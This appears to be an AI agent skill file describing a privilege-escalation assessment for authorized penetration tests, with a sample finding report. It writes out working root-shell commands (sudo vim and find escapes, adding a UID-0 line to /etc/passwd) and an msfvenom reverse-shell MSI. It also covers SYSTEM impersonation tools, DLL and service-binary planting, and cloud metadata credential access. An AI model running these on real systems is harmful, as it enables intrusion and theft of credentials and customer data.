\title{Performing Privilege Escalation Assessment}

\taxon{skill}

\tag{privilege-escalation}

\tag{post-exploitation}

\tag{Linux-privesc}

\tag{Windows-privesc}

\tag{local-exploitation}

\meta{version}{1.0.0}

\meta{description}{Performs privilege escalation assessments on compromised Linux and Windows systems to identify paths from low-privilege access to root or SYSTEM-level control. The tester enumerates misconfigurations, vulnerable services, kernel exploits, SUID binaries, unquoted service paths, and credential stores to demonstrate the full impact of an initial compromise. Activates for requests involving privilege escalation testing, local exploitation, post-compromise escalation, or OS-level security assessment.}

\subtree{
\title{Performing Privilege Escalation Assessment}
\subtree{
\title{When to Use}
\ul{
\li{After gaining initial low-privilege access during a penetration test to demonstrate full system compromise}
\li{Assessing the security hardening of Linux and Windows servers against local privilege escalation attacks}
\li{Evaluating whether endpoint detection and response (EDR) tools detect common privilege escalation techniques}
\li{Testing the effectiveness of least-privilege policies and application whitelisting on endpoints}
\li{Validating that container breakout and VM escape controls are properly configured}
}

\p{\strong{Do not use} without written authorization, against production systems where exploitation could cause downtime, or for deploying kernel exploits on systems without prior approval and rollback capability.}
}

\subtree{
\title{Prerequisites}
\ul{
\li{Low-privilege shell access (reverse shell, SSH, RDP) to the target system obtained through authorized means}
\li{Privilege escalation enumeration scripts: linPEAS (Linux), winPEAS (Windows), Linux Smart Enumeration (LSE)}
\li{Compiled kernel exploits for common CVEs or access to compilation tools on the target}
\li{GTFOBins reference for Linux SUID/sudo binary abuse and LOLBAS reference for Windows living-off-the-land binaries}
\li{Precompiled post-exploitation binaries for the target architecture if compilation is not available on the target}
}
}

\subtree{
\title{Workflow}
\subtree{
\title{Step 1: System Enumeration}
\p{Gather comprehensive information about the target system:}

\p{\strong{Linux Enumeration:}}

\ul{
\li{\code{\startverb id && whoami\stopverb} - Current user and group memberships}
\li{\code{\startverb uname -a\stopverb} - Kernel version for kernel exploit identification}
\li{\code{\startverb cat /etc/os-release\stopverb} - Distribution and version}
\li{\code{\startverb sudo -l\stopverb} - Commands the current user can run as root via sudo}
\li{\code{\startverb find / -perm -4000 -type f 2>/dev/null\stopverb} - SUID binaries}
\li{\code{\startverb find / -perm -2000 -type f 2>/dev/null\stopverb} - SGID binaries}
\li{\code{\startverb crontab -l && ls -la /etc/cron*\stopverb} - Scheduled tasks running as root}
\li{\code{\startverb ps aux | grep root\stopverb} - Processes running as root}
\li{\code{\startverb cat /etc/passwd\stopverb} - User accounts (look for additional users with UID 0)}
\li{\code{\startverb find / -writable -type d 2>/dev/null\stopverb} - World-writable directories}
\li{Run \code{\startverb linpeas.sh\stopverb} for automated comprehensive enumeration}
}

\p{\strong{Windows Enumeration:}}

\ul{
\li{\code{\startverb whoami /priv\stopverb} - Current user privileges (look for SeImpersonatePrivilege, SeDebugPrivilege)}
\li{\code{\startverb systeminfo\stopverb} - OS version, hotfix level, architecture}
\li{\code{\startverb wmic service get name,pathname,startmode\stopverb} - Unquoted service paths}
\li{\startverb `icacls "C:\Program Files" /T` - Writable directories in Program Files\stopverb}
\li{\startverb `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated` - AlwaysInstallElevated check\stopverb}
\li{\code{\startverb cmdkey /list\stopverb} - Stored Windows credentials}
\li{\code{\startverb schtasks /query /fo LIST /v\stopverb} - Scheduled tasks with their run-as accounts}
\li{Run \code{\startverb winPEAS.exe\stopverb} for automated comprehensive enumeration}
}
}

\subtree{
\title{Step 2: Linux Privilege Escalation Vectors}
\p{Test identified escalation vectors systematically:}

\ul{
\li{\strong{Sudo misconfigurations}: If \code{\startverb sudo -l\stopverb} shows entries like \code{\startverb (ALL) NOPASSWD: /usr/bin/vim\stopverb}, use GTFOBins to escalate:}
\li{\code{\startverb sudo vim -c ':!/bin/bash'\stopverb} to spawn a root shell}
\li{Common dangerous sudo entries: vim, less, find, nmap, python, perl, ruby, awk, env}
\li{\strong{SUID binary abuse}: If a SUID binary is identified that allows arbitrary command execution, shell escape, or file read:}
\li{Custom SUID: Check if a custom SUID binary calls other programs without absolute paths (PATH injection)}
\li{Known SUID: Check GTFOBins for exploitation of standard SUID binaries}
\li{\strong{Cron job exploitation}: If a cron job runs a script writable by the current user, or runs a script from a writable directory:}
\li{Modify the script to add a reverse shell or SUID copy of bash}
\li{PATH-based cron exploitation: if the cron job calls a command without absolute path and PATH is writable}
\li{\strong{Kernel exploits}: Match the kernel version to known exploits:}
\li{DirtyPipe (CVE-2022-0847): Linux kernel 5.8-5.16.11}
\li{DirtyCow (CVE-2016-5195): Linux kernel 2.6.22-4.8.3}
\li{PwnKit (CVE-2021-4034): Polkit pkexec vulnerability affecting most Linux distributions}
\li{\strong{Capabilities abuse}: \code{\startverb getcap -r / 2>/dev/null\stopverb} to find binaries with elevated capabilities (cap_setuid, cap_dac_override)}
\li{\startverb **Writable /etc/passwd**: If /etc/passwd is writable, add a new root user: `echo 'newroot:$1$hash:0:0::/root:/bin/bash' >> /etc/passwd`\stopverb}
}
}

\subtree{
\title{Step 3: Windows Privilege Escalation Vectors}
\p{Test Windows-specific escalation paths:}

\ul{
\li{\strong{Token impersonation}: If the user has \code{\startverb SeImpersonatePrivilege\stopverb} (common for service accounts and IIS):}
\li{Use \code{\startverb JuicyPotato.exe\stopverb}, \code{\startverb PrintSpoofer.exe\stopverb}, or \code{\startverb GodPotato.exe\stopverb} to impersonate SYSTEM}
\li{\startverb `PrintSpoofer.exe -i -c "cmd /c whoami"` -> `NT AUTHORITY\SYSTEM`\stopverb}
\li{\startverb **Unquoted service paths**: If a service has an unquoted path with spaces (e.g., `C:\Program Files\My App\service.exe`) and you can write to an intermediate directory:\stopverb}
\li{\startverb Place a malicious executable at `C:\Program Files\My.exe` which will execute when the service restarts\stopverb}
\li{\strong{Writable service binaries}: If you can modify the executable of a service running as SYSTEM:}
\li{Replace the binary with a reverse shell and restart the service}
\li{\strong{AlwaysInstallElevated}: If both HKLM and HKCU AlwaysInstallElevated registry keys are set to 1:}
\li{Generate a malicious MSI: \code{\startverb msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o shell.msi\stopverb}}
\li{Install with elevated privileges: \code{\startverb msiexec /quiet /qn /i shell.msi\stopverb}}
\li{\strong{Stored credentials}: Check for credentials in \code{\startverb cmdkey /list\stopverb}, AutoLogon registry keys, unattend.xml, web.config files, and PowerShell history}
\li{\strong{DLL hijacking}: Identify services that load DLLs from writable directories. Use Process Monitor to find missing DLL loads, then place a malicious DLL.}
\li{\strong{Scheduled tasks}: Find tasks running as SYSTEM with writable scripts or binaries}
}
}

\subtree{
\title{Step 4: Container and Cloud Escalation}
\p{Test for escalation paths in containerized and cloud environments:}

\ul{
\li{\strong{Docker breakout}: Check if the container runs in privileged mode (\code{\startverb --privileged\stopverb}), has the Docker socket mounted (\code{\startverb /var/run/docker.sock\stopverb}), or has \code{\startverb SYS_ADMIN\stopverb} capability}
\li{\strong{Kubernetes pod escalation}: Check for service account tokens with cluster-admin rights, hostPID/hostNetwork namespaces, or hostPath volume mounts}
\li{\strong{Cloud metadata}: Access cloud instance metadata from compromised hosts (\code{\startverb http://169.254.169.254/latest/meta-data/\stopverb}) to discover IAM roles, credentials, and instance information}
\li{\strong{IAM role abuse}: If cloud credentials are discovered, enumerate IAM permissions and test for privilege escalation through IAM policy manipulation}
}
}

\subtree{
\title{Step 5: Documentation and Impact Assessment}
\p{Document the complete escalation path and business impact:}

\ul{
\li{Record every command executed during escalation with timestamps}
\li{Capture proof of elevated access (whoami showing root/SYSTEM, accessing restricted files)}
\li{Document what data or systems become accessible at the elevated privilege level}
\li{Map the escalation technique to MITRE ATT&CK (T1548 - Abuse Elevation Control Mechanism, T1068 - Exploitation for Privilege Escalation)}
\li{Provide specific remediation for each identified escalation vector}
}
}
}

\subtree{
\title{Key Concepts}
\pre{\startverb
| Term | Definition |
|------|------------|
| **SUID Binary** | A Linux binary with the Set User ID bit enabled, which executes with the file owner's privileges (typically root) regardless of who runs it |
| **SeImpersonatePrivilege** | A Windows privilege that allows a process to impersonate another user's security token, commonly abused by service accounts to escalate to SYSTEM |
| **Kernel Exploit** | An exploit targeting a vulnerability in the operating system kernel to gain ring-0 or root/SYSTEM-level access |
| **GTFOBins** | A curated list of Unix binaries that can be exploited for privilege escalation, file read/write, or shell escape when misconfigured |
| **LOLBAS** | Living Off The Land Binaries and Scripts; legitimate Windows binaries that can be abused for code execution, file operations, or persistence |
| **DLL Hijacking** | Exploiting the DLL search order on Windows to load a malicious DLL by placing it in a directory searched before the legitimate DLL location |
| **Token Impersonation** | A Windows technique where a compromised process with appropriate privileges captures and uses another user's access token to execute commands as that user |
\stopverb}
}

\subtree{
\title{Tools & Systems}
\ul{
\li{\strong{linPEAS / winPEAS}: Automated privilege escalation enumeration scripts that check hundreds of potential escalation vectors on Linux and Windows}
\li{\strong{GTFOBins / LOLBAS}: Reference databases of Unix binaries and Windows binaries that can be exploited for privilege escalation when misconfigured}
\li{\strong{PrintSpoofer / GodPotato}: Windows privilege escalation tools that exploit \code{\startverb SeImpersonatePrivilege\stopverb} to achieve SYSTEM-level access from service accounts}
\li{\strong{Linux Exploit Suggester}: Script that compares the target kernel version against a database of known kernel exploits to identify applicable exploits}
}
}

\subtree{
\title{Common Scenarios}
\subtree{
\title{Scenario: Privilege Escalation on a Linux Web Server}
\p{\strong{Context}: During a penetration test, the tester gained a low-privilege shell as \code{\startverb www-data\stopverb} on an Ubuntu 22.04 web server through a PHP file upload vulnerability. The goal is to escalate to root to demonstrate full server compromise.}

\p{\strong{Approach}:}

\ol{
\li{Run \code{\startverb linpeas.sh\stopverb} which identifies that \code{\startverb www-data\stopverb} can run \code{\startverb /usr/bin/find\stopverb} as root via sudo without a password}
\li{Verify with \code{\startverb sudo -l\stopverb}: \code{\startverb (root) NOPASSWD: /usr/bin/find\stopverb}}
\li{\startverb Consult GTFOBins for the `find` sudo entry: `sudo find . -exec /bin/bash -p \; -quit`\stopverb}
\li{Execute the command and obtain a root shell}
\li{As root, access \code{\startverb /etc/shadow\stopverb} to extract password hashes, read database credentials from the application configuration, and access the MySQL database containing customer PII}
\li{Document: initial access as www-data -> sudo misconfiguration -> root shell -> database access -> 75,000 customer records accessible}
}

\p{\strong{Pitfalls}:}

\ul{
\li{Running kernel exploits without testing on a similar system first, risking a kernel panic and system crash}
\li{Not checking for container environments where apparent root access may be limited to the container namespace}
\li{Ignoring cloud metadata endpoints accessible from the compromised host that may yield IAM credentials}
\li{Failing to enumerate capabilities and SUID binaries after checking sudo, missing alternative escalation paths}
}
}
}

\subtree{
\title{Output Format}
\pre{\startverb
## Finding: Sudo Misconfiguration Allowing Root Escalation via find

**ID**: PRIV-001
**Severity**: Critical (CVSS 8.8)
**Affected Host**: web-prod-01 (10.10.5.15)
**OS**: Ubuntu 22.04 LTS
**Initial Access**: www-data (via PHP file upload - WEB-004)
**Escalation Technique**: MITRE ATT&CK T1548.003 - Sudo and Sudo Caching

**Description**:
The www-data user is configured in /etc/sudoers to execute /usr/bin/find as root
without a password. The find command supports the -exec flag which can spawn a
root shell, effectively granting www-data unrestricted root access.

**Proof of Concept**:
www-data@web-prod-01:~$ sudo -l
(root) NOPASSWD: /usr/bin/find
www-data@web-prod-01:~$ sudo find . -exec /bin/bash -p \; -quit
root@web-prod-01:~# id
uid=0(root) gid=0(root) groups=0(root)

**Impact**:
Full root access on the production web server. From root, the tester accessed
database credentials in /var/www/app/.env, connected to MySQL, and confirmed
read access to 75,000 customer records including names, emails, and addresses.

**Remediation**:
1. Remove the /usr/bin/find sudo entry for www-data
2. If find access is required, restrict it to specific directories with --no-exec
3. Audit all sudo entries for binaries listed in GTFOBins
4. Implement sudo logging with auditd for all privileged command execution
\stopverb}
}
}